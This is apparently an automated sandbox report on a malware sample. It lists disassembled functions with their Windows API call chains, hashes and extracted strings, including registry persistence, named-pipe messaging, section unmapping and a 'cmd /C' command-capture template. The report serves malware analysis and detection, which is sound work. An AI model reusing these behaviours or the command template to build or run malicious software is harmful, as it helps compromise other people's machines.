    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
